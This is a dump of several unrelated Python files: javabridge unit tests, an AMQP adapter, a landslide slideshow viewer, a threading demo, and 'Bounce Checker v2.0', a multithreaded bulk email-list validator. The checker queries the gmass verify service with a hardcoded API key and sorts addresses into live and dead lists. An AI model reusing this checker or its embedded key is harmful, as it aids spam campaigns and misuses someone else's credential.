def test_01_05_02_no_class_for_get_static_field(self):
def fn():
javabridge.get_static_field(
'no/such/class', "field", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_03_set_static_field(self):
class_name = "org/cellprofiler/javabridge/test/RealRect"
test_cases = (
("fs_char", "C", "A"),
("fs_byte", "B", 3),
("fs_short", "S", 15),
("fs_int", "I", 392),
("fs_long", "J", -14),
("fs_float", "F", 1.03),
("fs_double", "D", -889.1),
("fs_object", "Ljava/lang/Object;",
javabridge.make_instance("java/lang/Integer", "(I)V", 15)),
("fs_object", "Ljava/lang/Object;", None))
for field_name, signature, value in test_cases:
javabridge.set_static_field(class_name, field_name, signature, value)
v = javabridge.get_static_field(class_name, field_name, signature)
if isinstance(value, float):
self.assertAlmostEqual(v, value)
elif isinstance(value, javabridge.JB_Object):
self.assertTrue(javabridge.call(
value, "equals", "(Ljava/lang/Object;)Z", v))
else:
self.assertEqual(v, value)
def test_01_05_04_no_field_for_set_static_field(self):
def fn():
javabridge.set_static_field(
'java/lang/Object', "NoSuchField", "I", 5)
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_05_no_class_for_set_static_field(self):
def fn():
javabridge.set_static_field(
'no/such/class', "field", "I", 5)
self.assertRaises(javabridge.JavaException, fn)
def test_01_06_get_enumeration_wrapper(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
keys = javabridge.call(properties, "keys", "()Ljava/util/Enumeration;")
enum = javabridge.get_enumeration_wrapper(keys)
has_java_vm_name = False
while(enum.hasMoreElements()):
key = javabridge.to_string(enum.nextElement())
if key == "java.vm.name":
has_java_vm_name = True
self.assertTrue(has_java_vm_name)
def test_01_07_get_dictionary_wrapper(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
self.assertTrue(d.size() > 10)
self.assertFalse(d.isEmpty())
keys = javabridge.get_enumeration_wrapper(d.keys())
values = javabridge.get_enumeration_wrapper(d.elements())
n_elems = d.size()
for i in range(n_elems):
self.assertTrue(keys.hasMoreElements())
key = javabridge.to_string(keys.nextElement())
self.assertTrue(values.hasMoreElements())
value = javabridge.to_string(values.nextElement())
self.assertEqual(javabridge.to_string(d.get(key)), value)
self.assertFalse(keys.hasMoreElements())
self.assertFalse(values.hasMoreElements())
def test_01_08_jenumeration_to_string_list(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
keys = javabridge.jenumeration_to_string_list(d.keys())
enum = javabridge.get_enumeration_wrapper(d.keys())
for i in range(d.size()):
key = javabridge.to_string(enum.nextElement())
self.assertEqual(key, keys[i])
def test_01_09_jdictionary_to_string_dictionary(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
pyd = javabridge.jdictionary_to_string_dictionary(properties)
keys = javabridge.jenumeration_to_string_list(d.keys())
for key in keys:
value = javabridge.to_string(d.get(key))
self.assertEqual(pyd[key], value)
def test_01_10_make_new(self):
env = self.env
class MyClass:
new_fn = javabridge.make_new("java/lang/Object", '()V')
def __init__(self):
self.new_fn()
my_instance = MyClass()
def test_01_11_class_for_name(self):
c = javabridge.class_for_name('java.lang.String')
name = javabridge.call(c, 'getCanonicalName', '()Ljava/lang/String;')
self.assertEqual(name, 'java.lang.String')
def test_02_01_access_object_across_environments(self):
#
# Create an object in one environment, close the environment,
# open a second environment, then use it and delete it.
#
env = self.env
self.assertTrue(isinstance(env,javabridge.JB_Env))
class MyInteger:
new_fn = javabridge.make_new("java/lang/Integer",'(I)V')
def __init__(self, value):
self.new_fn(value)
intValue = javabridge.make_method("intValue", '()I')
my_value = 543
my_integer=MyInteger(my_value)
def run(my_integer = my_integer):
env = javabridge.attach()
self.assertEqual(my_integer.intValue(),my_value)
javabridge.detach()
t = threading.Thread(target = run)
t.start()
t.join()
def test_02_02_delete_in_environment(self):
env = self.env
self.assertTrue(isinstance(env, javabridge.JB_Env))
class MyInteger:
new_fn = javabridge.make_new("java/lang/Integer",'(I)V')
def __init__(self, value):
self.new_fn(value)
intValue = javabridge.make_method("intValue", '()I')
my_value = 543
my_integer=MyInteger(my_value)
def run(my_integer = my_integer):
env = javabridge.attach()
self.assertEqual(my_integer.intValue(),my_value)
del my_integer
javabridge.detach()
t = threading.Thread(target = run)
t.start()
t.join()
def test_02_03_death_and_resurrection(self):
'''Put an object into another in Java, delete it in Python and recover it'''
np.random.seed(24)
my_value = np.random.randint(0, 1000)
jobj = javabridge.make_instance("java/lang/Integer", "(I)V", my_value)
integer_klass = self.env.find_class("java/lang/Integer")
jcontainer = self.env.make_object_array(1, integer_klass)
self.env.set_object_array_element(jcontainer, 0, jobj)
del jobj
gc.collect()
jobjs = self.env.get_object_array_elements(jcontainer)
jobj = jobjs[0]
self.assertEqual(javabridge.call(jobj, "intValue", "()I"), my_value)
def test_02_04_non_java_thread_deletes_it(self):
'''Delete a Java object on a not-Java thread'''
refs = [javabridge.make_instance("java/lang/Integer", "(I)V", 5)]
def run():
del refs[0]
gc.collect()
t = threading.Thread(target = run)
t.start()
t.join()
def test_03_01_cw_from_class(self):
'''Get a class wrapper from a class'''
c = javabridge.get_class_wrapper(javabridge.make_instance('java/lang/Integer', '(I)V',
14))
def test_03_02_cw_from_string(self):
'''Get a class wrapper from a string'''
c = javabridge.get_class_wrapper("java.lang.Number")
def test_03_03_cw_get_classes(self):
c = javabridge.get_class_wrapper('java.lang.Number')
classes = c.getClasses()
self.assertEqual(len(javabridge.get_env().get_object_array_elements(classes)), 0)
def test_03_04_cw_get_annotation(self):
c = javabridge.get_class_wrapper('java.security.Identity')
annotation = c.getAnnotation(javabridge.class_for_name('java.lang.Deprecated'))
self.assertTrue(annotation is not None)
def test_03_05_cw_get_annotations(self):
c = javabridge.get_class_wrapper('java.security.Identity')
annotations = c.getAnnotations()
annotations = javabridge.get_env().get_object_array_elements(annotations)
self.assertEqual(len(annotations), 1)
self.assertTrue(javabridge.to_string(annotations[0]).startswith('@java.lang.Deprecated'))
def test_03_06_cw_get_constructors(self):
c = javabridge.get_class_wrapper('java.lang.String')
constructors = c.getConstructors()
constructors = javabridge.get_env().get_object_array_elements(constructors)
self.assertEqual(len(constructors), 15)
def test_03_07_cw_get_fields(self):
c = javabridge.get_class_wrapper('java.lang.String')
fields = c.getFields()
fields = javabridge.get_env().get_object_array_elements(fields)
self.assertEqual(len(fields), 1)
self.assertEqual(javabridge.call(fields[0], 'getName', '()Ljava/lang/String;'),
"CASE_INSENSITIVE_ORDER")
def test_03_08_cw_get_field(self):
c = javabridge.get_class_wrapper('java.lang.String')
field = c.getField('CASE_INSENSITIVE_ORDER')
modifiers = javabridge.call(field, 'getModifiers', '()I')
static = javabridge.get_static_field('java/lang/reflect/Modifier','STATIC','I')
self.assertEqual((modifiers & static), static)
def test_03_09_cw_get_method(self):
sclass = javabridge.class_for_name('java.lang.String')
iclass = javabridge.get_static_field('java/lang/Integer', 'TYPE',
'Ljava/lang/Class;')
c = javabridge.get_class_wrapper('java.lang.String')
m = c.getMethod('charAt', [ iclass ])
self.assertEqual(javabridge.to_string(javabridge.call(m, 'getReturnType', '()Ljava/lang/Class;')), 'char')
m = c.getMethod('concat', [ sclass])
self.assertEqual(javabridge.to_string(javabridge.call(m, 'getReturnType', '()Ljava/lang/Class;')),
'class java.lang.String')
def test_03_10_cw_get_methods(self):
c = javabridge.get_class_wrapper('java.lang.String')
mmm = javabridge.get_env().get_object_array_elements(c.getMethods())
self.assertTrue(any([javabridge.call(m, 'getName', '()Ljava/lang/String;') == 'concat'
for m in mmm]))
def test_03_11_cw_get_constructor(self):
c = javabridge.get_class_wrapper('java.lang.String')
sclass = javabridge.class_for_name('java.lang.String')
constructor = c.getConstructor([sclass])
self.assertEqual(javabridge.call(constructor, 'getName', '()Ljava/lang/String;'),
'java.lang.String')
def test_04_01_field_get(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
v = f.get(None)
self.assertEqual(javabridge.to_string(v), '127')
def test_04_02_field_name(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
self.assertEqual(f.getName(), 'MAX_VALUE')
def test_04_03_field_type(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
t = f.getType()
self.assertEqual(javabridge.to_string(t), 'byte')
def test_05_01_run_script(self):
self.assertEqual(javabridge.run_script("2+2"), 4)
def test_05_02_run_script_with_inputs(self):
self.assertEqual(javabridge.run_script("a+b", bindings_in={"a":2, "b":3}), 5)
def test_05_03_run_script_with_outputs(self):
outputs = { "result": None}
javabridge.run_script("var result = 2+2;", bindings_out=outputs)
self.assertEqual(outputs["result"], 4)
def test_06_01_execute_asynch_main(self):
javabridge.execute_runnable_in_main_thread(javabridge.run_script(
"new java.lang.Runnable() { run:function() {}};"))
def test_06_02_execute_synch_main(self):
javabridge.execute_runnable_in_main_thread(javabridge.run_script(
"new java.lang.Runnable() { run:function() {}};"), True)
def test_06_03_future_main(self):
c = javabridge.run_script("""
new java.util.concurrent.Callable() {
call: function() { return 2+2; }};""")
result = javabridge.execute_future_in_main_thread(
javabridge.make_future_task(c, fn_post_process=javabridge.unwrap_javascript))
self.assertEqual(result, 4)
def test_07_01_wrap_future(self):
future = javabridge.run_script("""
new java.util.concurrent.FutureTask(
new java.util.concurrent.Callable() {
call: function() { return 2+2; }});""")
wfuture = javabridge.get_future_wrapper(
future, fn_post_process=javabridge.unwrap_javascript)
self.assertFalse(wfuture.isDone())
self.assertFalse(wfuture.isCancelled())
wfuture.run()
self.assertTrue(wfuture.isDone())
self.assertEqual(wfuture.get(), 4)
def test_07_02_cancel_future(self):
future = javabridge.run_script("""
new java.util.concurrent.FutureTask(
new java.util.concurrent.Callable() {
call: function() { return 2+2; }});""")
wfuture = javabridge.get_future_wrapper(
future, fn_post_process=javabridge.unwrap_javascript)
wfuture.cancel(True)
self.assertTrue(wfuture.isCancelled())
self.assertRaises(javabridge.JavaException, wfuture.get)
def test_07_03_make_future_task_from_runnable(self):
future = javabridge.make_future_task(
javabridge.run_script("new java.lang.Runnable() { run: function() {}};"),
11)
future.run()
self.assertEqual(javabridge.call(future.get(), "intValue", "()I"), 11)
def test_07_04_make_future_task_from_callable(self):
call_able = javabridge.run_script("""
new java.util.concurrent.Callable() {
call: function() { return 2+2; }};""")
future = javabridge.make_future_task(
call_able, fn_post_process=javabridge.unwrap_javascript)
future.run()
self.assertEqual(future.get(), 4)
def test_08_01_wrap_collection(self):
c = javabridge.make_instance("java/util/HashSet", "()V")
w = javabridge.get_collection_wrapper(c)
self.assertFalse(hasattr(w, "addI"))
self.assertEqual(w.size(), 0)
self.assertEqual(len(w), 0)
self.assertTrue(w.isEmpty())
def test_08_02_add(self):
c = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
self.assertTrue(c.add("Foo"))
self.assertEqual(len(c), 1)
self.assertFalse(c.isEmpty())
def test_08_03_contains(self):
c = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c.add("Foo")
self.assertTrue(c.contains("Foo"))
self.assertFalse(c.contains("Bar"))
self.assertIn("Foo", c)
self.assertNotIn("Bar", c)
def test_08_04_addAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c2.addAll(c1.o)
self.assertIn("Foo", c2)
def test_08_05__add__(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c3 = c1 + c2
for k in ("Foo", "Bar", "Baz"):
self.assertIn(k, c3)
c4 = c3 + ["Hello", "World"]
self.assertIn("Hello", c4)
self.assertIn("World", c4)
def test_08_06__iadd__(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c2 += c1
for k in ("Foo", "Bar", "Baz"):
self.assertIn(k, c2)
c2 += ["Hello", "World"]
self.assertIn("Hello", c2)
self.assertIn("World", c2)
def test_08_07_contains_all(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
self.assertFalse(c2.containsAll(c1.o))
c2 += c1
self.assertTrue(c2.containsAll(c1.o))
def test_08_08_remove(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c1.remove("Foo")
self.assertNotIn("Foo", c1)
def test_08_09_removeAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Foo")
c1.removeAll(c2)
self.assertNotIn("Foo", c1)
def test_08_10_retainAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Foo")
c1.retainAll(c2)
self.assertIn("Foo", c1)
self.assertNotIn("Bar", c1)
def test_08_11_toArray(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
result = [javabridge.to_string(x) for x in c1.toArray()]
self.assertIn("Foo", result)
self.assertIn("Bar", result)
def test_08_12_make_list(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertSequenceEqual(l, ["Foo", "Bar"])
self.assertTrue(hasattr(l, "addI"))
def test_08_13_addI(self):
l = javabridge.make_list(["Foo", "Bar"])
l.addI(1, "Baz")
self.assertSequenceEqual(l, ["Foo", "Baz", "Bar"])
def test_08_14_addAllI(self):
l = javabridge.make_list(["Foo", "Bar"])
l.addAllI(1, javabridge.make_list(["Baz"]))
self.assertSequenceEqual(l, ["Foo", "Baz", "Bar"])
def test_08_15_indexOf(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertEqual(l.indexOf("Bar"), 1)
self.assertEqual(l.lastIndexOf("Foo"), 0)
def test_08_16_get(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertEqual(l.get(1), "Bar")
def test_08_17_set(self):
l = javabridge.make_list(["Foo", "Bar"])
l.set(1, "Baz")
self.assertEqual(l.get(1), "Baz")
def test_08_18_subList(self):
l = javabridge.make_list(["Foo", "Bar", "Baz", "Hello", "World"])
self.assertSequenceEqual(l.subList(1, 3), ["Bar", "Baz"])
def test_08_19__getitem__(self):
l = javabridge.make_list(["Foo", "Bar", "Baz", "Hello", "World"])
self.assertEqual(l[1], "Bar")
self.assertEqual(l[-2], "Hello")
self.assertSequenceEqual(l[1:3], ["Bar", "Baz"])
self.assertSequenceEqual(l[::3], ["Foo", "Hello"])
def test_08_20__setitem__(self):
l = javabridge.make_list(["Foo", "Bar"])
l[1] = "Baz"
self.assertEqual(l.get(1), "Baz")
def test_08_21__delitem__(self):
l = javabridge.make_list(["Foo", "Bar", "Baz"])
del l[1]
self.assertSequenceEqual(l, ["Foo", "Baz"])
def test_09_01_00_get_field(self):
o = javabridge.make_instance("org/cellprofiler/javabridge/test/RealRect", "(DDDD)V", 1, 2, 3, 4)
self.assertEqual(javabridge.get_field(o, "x", "D"), 1)
def test_09_02_get_field_no_such_field(self):
def fn():
o = javabridge.make_instance("java/lang/Object", "()V")
javabridge.get_field(o, "NoSuchField", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_09_03_set_field(self):
class_name = "org/cellprofiler/javabridge/test/RealRect"
o = javabridge.make_instance(class_name, "()V")
test_cases = (
("f_char", "C", "A"),
("f_byte", "B", 3),
("f_short", "S", 15),
("f_int", "I", 392),
("f_long", "J", -14),
("f_float", "F", 1.03),
("f_double", "D", -889.1),
("f_object", "Ljava/lang/Object;",
javabridge.make_instance("java/lang/Integer", "(I)V", 15)),
("f_object", "Ljava/lang/Object;", None))
for field_name, signature, value in test_cases:
javabridge.set_field(o, field_name, signature, value)
v = javabridge.get_field(o, field_name, signature)
if isinstance(value, float):
self.assertAlmostEqual(v, value)
elif isinstance(value, javabridge.JB_Object):
self.assertTrue(javabridge.call(
value, "equals", "(Ljava/lang/Object;)Z", v))
else:
self.assertEqual(v, value)
def test_09_04_set_field_no_such_field(self):
def fn():
o = javabridge.make_instance("java/lang/Object", "()V")
javabridge.set_field(o, "NoSuchField", "I", 1)
self.assertRaises(javabridge.JavaException, fn)
def test_10_01_iterate_java_on_non_iterator(self):
#
# Regression test of issue #11: the expression below segfaulted
#
def fn():
list(javabridge.iterate_java(javabridge.make_list(range(10)).o))
self.assertRaises(javabridge.JavaError, fn)
def test_10_01_class_path(self):
for arg in ['-cp', '-classpath', '-Djava.class.path=foo']:
self.assertRaises(ValueError, lambda: javabridge.start_vm([arg]))
def test_11_01_make_run_dictionary(self):
from javabridge.jutil import make_run_dictionary
o = javabridge.make_instance("java/util/Hashtable", "()V")
a = javabridge.make_instance("java/util/ArrayList", "()V")
javabridge.call(
o, "put",
"(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;",
"foo", "bar")
javabridge.call(
o, "put",
"(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;",
"baz", a)
d = make_run_dictionary(o)
self.assertIn("foo", d)
self.assertEqual(d["foo"], "bar")
self.assertIn("baz", d)
self.assertTrue(javabridge.call(d["baz"], "equals",
"(Ljava/lang/Object;)Z", a))
def test_12_01_jref(self):
o = dict(foo="bar", baz="2")
ref_id, ref = javabridge.create_jref(o)
alt = javabridge.redeem_jref(ref_id)
o["bar"] = "bunny"
for key in o:
self.assertTrue(key in alt)
self.assertEqual(o[key], alt[key])
def test_12_02_jref_lost(self):
o = dict(foo="bar", baz="2")
ref_id, ref = javabridge.create_jref(o)
del ref
self.assertRaises(KeyError, javabridge.redeem_jref, ref_id)
def test_12_03_jref_create_and_lock(self):
cpython = javabridge.JClassWrapper(
'org.cellprofiler.javabridge.CPython')()
d = javabridge.JClassWrapper('java.util.Hashtable')()
result = javabridge.JClassWrapper('java.util.ArrayList')()
d.put("result", result)
ref_self = javabridge.create_and_lock_jref(self)
d.put("self", ref_self)
cpython.execute(
'import javabridge\n'
'x = { "foo":"bar"}\n'
'ref_id = javabridge.create_and_lock_jref(x)\n'
'javabridge.JWrapper(result).add(ref_id)', d, d)
cpython.execute(
'import javabridge\n'
'ref_id = javabridge.JWrapper(result).get(0)\n'
'self = javabridge.redeem_jref(javabridge.to_string(self))\n'
'self.assertEqual(javabridge.redeem_jref(ref_id)["foo"], "bar")\n'
'javabridge.unlock_jref(ref_id)', d, d)
javabridge.unlock_jref(ref_self)
self.assertRaises(KeyError, javabridge.redeem_jref, ref_self)
def test_13_01_unicode_arg(self):
# On 2.x, check that a unicode argument is properly prepared
s = u"Hola ni\u00F1os"
s1, s2 = s.split(" ")
if sys.version_info.major == 2:
s2 = s2.encode("utf-8")
env = javabridge.get_env()
js1 = env.new_string(s1+" ")
result = javabridge.call(
js1, "concat", "(Ljava/lang/String;)Ljava/lang/String;", s2)
self.assertEqual(s, result)
if __name__=="__main__":
unittest.main()
|
AmqpAdapter.py
|
import pika
import threading
class AmqpAdapter:
def __init__(self, name, controller):
self.sub_connection = None
self.sub_channel = None
self.pub_connection = None
self.pub_channel = None
self.name = name
self.controller = controller
self.properties = {}
async def connect(self, address):
self.sub_connection = pika.BlockingConnection(pika.ConnectionParameters(address))
self.sub_channel = self.sub_connection.channel()
self.pub_connection = pika.BlockingConnection(pika.ConnectionParameters(address))
self.pub_channel = self.pub_connection.channel()
async def subscribe(self, topic, qos=None):
self.sub_channel.queue_declare(topic)
self.sub_channel.basic_consume(queue=topic, auto_ack=True, on_message_callback=self.callback)
print("subscribed to " + topic)
async def publish(self, topic, identifier, payload, settings):
prop = self.properties.get(topic)
if prop is None:
self.properties[topic] = pika.BasicProperties(reply_to=topic)
prop = self.properties[topic]
self.pub_channel.basic_publish(exchange='', routing_key=topic, body=str(identifier + payload), properties=prop)
async def start_client(self):
thread = threading.Thread(target=self.looping)
thread.start()
async def stop_client(self):
try:
self.sub_channel.stop_consuming()
self.sub_connection.close()
self.pub_connection.close()
except:
print("Client disconnected")
    # The topic name is passed along in the message content (via the reply_to property)
def callback(self, ch, method, properties, body):
topic = properties.reply_to
self.controller.react(topic, body.decode("utf-8"))
def looping(self):
try:
self.sub_channel.start_consuming()
except:
print("Connection closed")
|
snippet.py
|
#!/usr/bin/env python
"""
If you use landslide to create slideshows using markdown, you may have found
yourself repeating endlessly:
+ save source document
+ switch to the terminal to run landslide
+ reload the generated html in your browser
This Qt (using WebKit) based "application" monitors changes to the source file
and automatically regenerates the HTML and refreshes the "browser".
$ ./qtkit.py --help
usage: qtkit.py [-h] --landslide LANDSLIDE [--port PORT] [--html HTML] file
landslide text to html viewer
positional arguments:
file text file (md or rst)
optional arguments:
-h, --help show this help message and exit
--landslide LANDSLIDE
path to the landslide binary
--port PORT simple http server port (default 8000)
--html HTML html filename (default presentation.html)
To quit close the QT window or press ctrl + c in the terminal.
"""
import sys
import os
import signal
import subprocess
import SimpleHTTPServer
import SocketServer
from multiprocessing import Process
import argparse
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class FullHelpArgumentParser(argparse.ArgumentParser):
""" argument parser displaying the complete help on error """
# http://stackoverflow.com/a/4042861/753565
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
def parse_arguments():
""" argparse wrapper """
parser = FullHelpArgumentParser(description='landslide text to html viewer')
parser.add_argument('file', help='text file (md or rst)', action='store')
parser.add_argument('--landslide', help='path to the landslide binary',
action='store', required=True)
parser.add_argument('--port', type=int, help='simple http server port (default 8000)',
default=8000, action='store')
parser.add_argument('--html', help='html filename (default presentation.html)',
default='presentation.html', action='store')
return parser.parse_args()
def http_server(path, port):
""" start a simple http server listening on port serving files from path """
os.chdir(path)
handler = SimpleHTTPServer.SimpleHTTPRequestHandler
# http://stackoverflow.com/questions/337115/setting-time-wait-tcp
SocketServer.TCPServer.allow_reuse_address = True
http = SocketServer.TCPServer(('', port), handler)
# handling a ctrl-c termination
try:
http.serve_forever()
except KeyboardInterrupt:
pass
def landslide(args):
""" run args.landslide on args.file to create args.html """
html_file = os.path.join(os.path.dirname(args.file), args.html)
subprocess.call([args.landslide, '--embed', args.file, '-d', html_file])
def start_fs_watcher(web, args):
""" create a watcher on args.file, calling landslide and reloading web """
# http://stackoverflow.com/a/5339877/753565
@pyqtSlot(str)
def file_changed(path):
landslide(args)
web.reload()
fs_watcher = QFileSystemWatcher([args.file])
fs_watcher.connect(fs_watcher, SIGNAL('fileChanged(QString)'), file_changed)
return fs_watcher
def main():
args = parse_arguments()
# using multiprocessing to start the http server in its own process
http = Process(target=http_server, args=(os.path.dirname(args.file), args.port))
http.start()
app = QApplication([])
web = QWebView()
fs_watcher = start_fs_watcher(web, args)
# compare html and text file last modified dates to only process if necessary
mtime_text_file = os.path.getmtime(args.file)
try:
mtime_html_file = os.path.getmtime(os.path.join(os.path.dirname(args.file), args.html))
except OSError:
mtime_html_file = 0
if mtime_text_file > mtime_html_file:
landslide(args)
web.load(QUrl('http://localhost:%i/%s' % (args.port, args.html)))
web.show()
# exiting from the command line (ctrl+c)
signal.signal(signal.SIGINT, signal.SIG_DFL)
# starting the QT event loop
app.exec_()
# del fs_watcher in a cleanup slot connected to the aboutToQuit signal doesn't work
del fs_watcher
http.terminate()
if __name__ == '__main__':
main()
|
threading-demo.py
|
import queue
import threading
import time
def putting_thread(q):
while True:
print('started thread')
time.sleep(10)
q.put(5)
print('put something')
q = queue.Queue()
t = threading.Thread(target=putting_thread, args=(q,), daemon=True)
t.start()
q.put(5)
print(q.get())
print('first item gotten')
print(q.get())
print('finished')
|
main.py
|
#============== Modules ===============#
import requests
from licensing.models import *
from licensing.methods import Key, Helpers
from colorama import Fore, Style, Back, init
from multiprocessing.dummy import Pool
import multiprocessing, time, datetime, ctypes
import re
import sys
import random
import os
import threading
import queue
import urllib3, urllib
import timeit
from threading import Thread
count = len(open('list.txt').readlines( ))
countlive = 0
countdd = 0
countall2 = 0
countrec = 0
init(autoreset=True)
from random import choice
init()
class bounce():
countlive = 0
countdd = 0
countall2 = 0
countrec = 0
ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'
live = '"Status":"Valid"'.encode()
die = '"Status":"Invalid"'.encode()
inputQueue = queue.Queue()
def __init__(self):
def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(1. / 10)
def logo():
fg = [
'\033[91;1m', # RED 0
'\033[92;1m', # GREEN 1
'\033[93;1m', # YELLOW 2
'\033[94;1m', # BLUE 3
'\033[95;1m', # MAGENTA 4
'\033[96;1m', # CYAN 5
'\033[97;1m' # WHITE 6
]
os.system('cls')
print('''
{2} ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
{2} ┃ {0}▄ █▀▄▀█ ██ █▄▄▄▄ ▄ ▄███▄ █ {2}┃
{2} ┃ {0}▀▄ █ █ █ █ █ █ █ ▄▀ █ █▀ ▀ █ {2}┃
{2} ┃ {0}█ ▀ █ ▄ █ █▄▄█ █▀▀▌ █ █ ██▄▄ █ {2}┃
{2} ┃ {0}▄ █ █ █ █ █ █ █ █ █ █▄ ▄▀ ███▄ {2}┃
{2} ┃ {0}█ ▀▄ █ █ █ █ █ ▀███▀ ▀ {2}┃
{2} ┃ {0}▀ ▀ █ ▀ █▐ {2}┃
{2} ┃ {0}▀ ▐ {2}┃
{2} ┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
{2} ┃ {0}Bounce Checker v2.0 {2}┃ {0}CODED BY xMarvel {2}┃
{2} ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
'''.format(fg[0], fg[1], fg[5], fg[4]))
logo()
bl = Fore.BLACK
wh = Fore.WHITE
yl = Fore.YELLOW
red = Fore.RED
gr = Fore.GREEN
ble = Fore.BLUE
res = Style.RESET_ALL
init(autoreset=True)
self.mailist = input(f'{gr} Give Me Your List{wh}/{red}root> {gr}${res} ')
self.thread = '50'
self.countList = len(list(open(self.mailist)))
self.clean = 'n'
if self.clean == 'y':
self.clean_rezult()
print('')
def save_to_file(self, nameFile, x):
kl = open(nameFile, 'a+')
kl.write(x)
kl.close()
def clean_rezult(self):
open('live.txt', 'w').close()
open('die.txt', 'w').close()
open('unknown.txt', 'w').close()
def post_email(self, eml):
try:
r = requests.get('https://verify.gmass.co/verify?email='+eml+'&key=52d5d6dd-cd2b-4e5a-a76a-1667aea3a6fc',
headers={'User-Agent': self.ua}
)
if self.live in r.content:
return 'live'
else:
return 'die'
except:
return 'unknown'
def chk(self):
while 1:
global countall2
global countdd
global countlive
global countrec
eml = self.inputQueue.get()
rez = self.post_email(eml)
if rez == 'die':
countall2 += 1
countdd += 1
                print(Fore.CYAN + f'[Bounce Checker 2.0]' + Fore.WHITE + ' | ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + Fore.RED + f" | {eml} | Die [ {countdd}/{count} ]")
ctypes.windll.kernel32.SetConsoleTitleW(f"[Bounce Checker 2.0] [ @xMarvel_OFFiCiAL] {countall2}/{count} | Live : {countlive} Recheck :{countrec} | Die : {countdd}")
self.save_to_file('die.txt', eml+'\n')
elif rez == 'live':
countall2 += 1
countlive += 1
                print(Fore.CYAN + f'[Bounce Checker 2.0]' + Fore.WHITE + ' | ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + Fore.GREEN + f" | {eml} | live [ {countlive}/{count} ]")
ctypes.windll.kernel32.SetConsoleTitleW(f"[Bounce Checker 2.0] {countall2}/{count} | Live : {countlive} Recheck :{countrec} | Die : {countdd}")
self.save_to_file('live.txt', eml+'\n')
elif rez == 'unknown':
countall2 += 1
countdd += 1
print(Fore.CYAN + '[Bounce Checker 2.0]' + Fore.WHITE + ' | ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + Fore.RED + f" | {eml} | die [ {countdd}/{count} ]")
self.save_to_file('die.txt', eml+'\n')
else:
print('contact @xMarval_support')
self.inputQueue.task_done()
def run_thread(self):
for x in range(int(self.thread)):
t = threading.Thread(target=self.chk)
            t.daemon = True
t.start()
for y in open(self.mailist, 'r').readlines():
self.inputQueue.put(y.strip())
self.inputQueue.join()
def finish(self):
print('')
        print(self.countList, 'emails have been checked by xMarvel Checker')
print('')
print('Live Emails : ', len(list(open('live.txt'))), 'emails')
print('Die Emails : ', len(list(open('die.txt'))), 'emails')
print('')
input('Enter To Exit --> ')
heh = bounce()
heh.run_thread()
heh.finish()
|
async_thread.py
|
